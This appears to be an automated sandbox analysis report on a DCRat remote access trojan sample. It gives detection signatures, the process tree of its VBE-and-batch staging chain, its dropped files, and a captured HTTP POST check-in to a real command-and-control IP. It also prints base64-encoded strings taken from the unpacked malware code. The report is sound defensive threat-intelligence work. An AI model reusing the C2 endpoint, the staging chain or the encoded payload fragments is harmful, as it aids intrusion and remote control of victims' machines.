Edit tour

Windows Analysis Report
o9jDrpZrgR.exe

Overview

General Information

Sample Name:	o9jDrpZrgR.exe
Original Sample Name:	c256204deb01c77e21ba17b5e2411245.exe
Analysis ID:	1345582
MD5:	c256204deb01c77e21ba17b5e2411245
SHA1:	95ae7fb9f6710368e44a3c4e839d3d7bebbd4d5e
SHA256:	f594822a45b8561a9b7a2e2ecf17558a692b1a193cf231617ba1b222723ca3ab
Tags:	DCRatexe
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Snort IDS alert for network traffic

Yara detected DCRat

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for dropped file

Machine Learning detection for sample

.NET source code contains potential unpacker

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

.NET source code contains very large strings

Machine Learning detection for dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to communicate with device drivers

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Enables debug privileges

AV process strings found (often used to terminate AV products)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

File is packed with WinRar

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Found WSH timer for Javascript or VBS script (likely evasive script)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Classification

Process Tree

System is w10x64

o9jDrpZrgR.exe (PID: 4308 cmdline: C:\Users\user\Desktop\o9jDrpZrgR.exe MD5: C256204DEB01C77E21BA17B5E2411245)

wscript.exe (PID: 5356 cmdline: "C:\Windows\System32\WScript.exe" "C:\reviewruntimeMonitor\oYwPDBVe3AuHG3t6JLon5FNZVJrzPzwK1qz3t5qd93gftXcSil5zO.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 2520 cmdline: C:\Windows\system32\cmd.exe /c ""C:\reviewruntimeMonitor\XfrEwTdqjpljDpai91jT4EKzapK.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

BlockrefBrokerperf.exe (PID: 5520 cmdline: C:\reviewruntimeMonitor/BlockrefBrokerperf.exe MD5: 295BF8D9B734730EFA567C8DA9918FE1)

cmd.exe (PID: 5000 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3664 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 2468 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

qBJICEqiLNwXNBLrN.exe (PID: 6604 cmdline: "C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe" MD5: 295BF8D9B734730EFA567C8DA9918FE1)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
o9jDrpZrgR.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2000894449.0000000004DA6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000003.2000527838.0000000006E2F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000005.00000000.2180051762.0000000000FC2000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000003.1999993579.0000000006524000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: o9jDrpZrgR.exe PID: 4308	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: BlockrefBrokerperf.exe PID: 5520	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: qBJICEqiLNwXNBLrN.exe PID: 6604	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0.3.o9jDrpZrgR.exe.657270c.0.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
5.0.BlockrefBrokerperf.exe.fc0000.0.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0.3.o9jDrpZrgR.exe.6e7d70c.1.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Snort Signatures

ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) - Source IP: 192.168.2.5 - Destination IP: 77.91.124.101

Timestamp:	192.168.2.577.91.124.10149712802048095 11/21/23-04:47:24.543305
SID:	2048095
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 344Expect: 100-continueConnection: Keep-Alive

System Summary

.NET source code contains very large strings

Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, s67.cs	Long String: Length: 402992
Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, s67.cs	Long String: Length: 402992

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_0088848E	0_2_0088848E
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_00894088	0_2_00894088
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_008900B7	0_2_008900B7
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_008840FE	0_2_008840FE
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_008A51C9	0_2_008A51C9
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_00897153	0_2_00897153
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_008962CA	0_2_008962CA
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_008832F7	0_2_008832F7
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_008943BF	0_2_008943BF
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_0088C426	0_2_0088C426
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_008AD440	0_2_008AD440
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_0088F461	0_2_0088F461
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_008977EF	0_2_008977EF
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_008AD8EE	0_2_008AD8EE
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_0088286B	0_2_0088286B
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_0088E9B7	0_2_0088E9B7
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_008B19F4	0_2_008B19F4
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_00896CDC	0_2_00896CDC
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_00893E0B	0_2_00893E0B
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_008A4F9A	0_2_008A4F9A
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: 0_2_0088EFE2	0_2_0088EFE2
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Code function: 5_2_00007FF848F41EC3	5_2_00007FF848F41EC3
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Code function: 5_2_00007FF848F51D55	5_2_00007FF848F51D55
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Code function: 5_2_00007FF84913D1C1	5_2_00007FF84913D1C1
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Code function: 12_2_00007FF848F31EC3	12_2_00007FF848F31EC3
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Code function: 12_2_00007FF848F41D55	12_2_00007FF848F41D55
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Code function: 12_2_00007FF848F3E5CD	12_2_00007FF848F3E5CD
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Code function: 12_2_00007FF84912D3C7	12_2_00007FF84912D3C7

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Section loaded: dxgidebug.dll	Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\BfMGYDNR.log 75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986

Source: o9jDrpZrgR.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: String function: 0089EC50 appears 56 times
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: String function: 0089F5F0 appears 31 times
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Code function: String function: 0089EB78 appears 39 times

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe

Code function: 0_2_00886FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00886FAA

Source: o9jDrpZrgR.exe, 00000000.00000003.2000894449.0000000004DA6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs o9jDrpZrgR.exe
Source: o9jDrpZrgR.exe, 00000000.00000003.2000527838.0000000006E2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs o9jDrpZrgR.exe
Source: o9jDrpZrgR.exe, 00000000.00000003.1999993579.0000000006524000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs o9jDrpZrgR.exe
Source: o9jDrpZrgR.exe	Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs o9jDrpZrgR.exe

Source: o9jDrpZrgR.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe

File created: C:\Users\user\Desktop\eQQkRcVr.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@18/43@0/1

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, m9F.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, m9F.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, m9F.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, m9F.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe

Code function: 0_2_00886C74 GetLastError,FormatMessageW,

0_2_00886C74

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe

Code function: 0_2_0089A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_0089A6C2

Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe

File created: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\reviewruntimeMonitor\XfrEwTdqjpljDpai91jT4EKzapK.bat" "

Source: o9jDrpZrgR.exe	ReversingLabs: Detection: 65%
Source: o9jDrpZrgR.exe	Virustotal: Detection: 69%

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe

File read: C:\Users\user\Desktop\o9jDrpZrgR.exe

Jump to behavior

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\o9jDrpZrgR.exe C:\Users\user\Desktop\o9jDrpZrgR.exe
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\reviewruntimeMonitor\oYwPDBVe3AuHG3t6JLon5FNZVJrzPzwK1qz3t5qd93gftXcSil5zO.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\reviewruntimeMonitor\XfrEwTdqjpljDpai91jT4EKzapK.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe C:\reviewruntimeMonitor/BlockrefBrokerperf.exe
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe "C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe"
Source: C:\Users\user\Desktop\o9jDrpZrgR.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\reviewruntimeMonitor\oYwPDBVe3AuHG3t6JLon5FNZVJrzPzwK1qz3t5qd93gftXcSil5zO.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\reviewruntimeMonitor\XfrEwTdqjpljDpai91jT4EKzapK.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe C:\reviewruntimeMonitor/BlockrefBrokerperf.exe	Jump to behavior
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe "C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe"	Jump to behavior

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe

File created: C:\Users\user\AppData\Local\Temp\nltb4WKmeR

Jump to behavior

Source: o9jDrpZrgR.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll	Jump to behavior

Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, s67.cs	Base64 encoded string: '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
Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, 8B6.cs	Base64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, 76n.cs	Base64 encoded string: 'UVtEeSHUk4yu9KPxdwSBr+sSkjGQFay1++KROxhl0u6A4n6QgKK9owCeJt4/ibRTaf4E5m/SCzpsURAMEr5Xg3qngaD25tEDnlwMC28qHpOjjYZZ3ftJybEZu9RT7fycp80B+C1+JH+0A7jyMX5ephjAjCm0aInhrTOAyfr2JSpnTXQoEphTKT9lyNJy7CA3kEbeH3HL9tf5TAJ1jraZfyFRNee9l9rkyXMwZL6Yyla2N9LSaYuIx5ETZrU5ZIeG'
Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, 7YK.cs	Base64 encoded string: 'uuzZiJXU5s98btEVomQruuLVWIdl8LsBzbXXAtrjRn45ZPAhuiYQKqWAjeDZqvVtA8J9WrV44qaGzP5GH50axc0IEXxfqS3fSL5bGALCNdVdQQKUi6Ru446iHA483zOm'
Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, 52Z.cs	Base64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
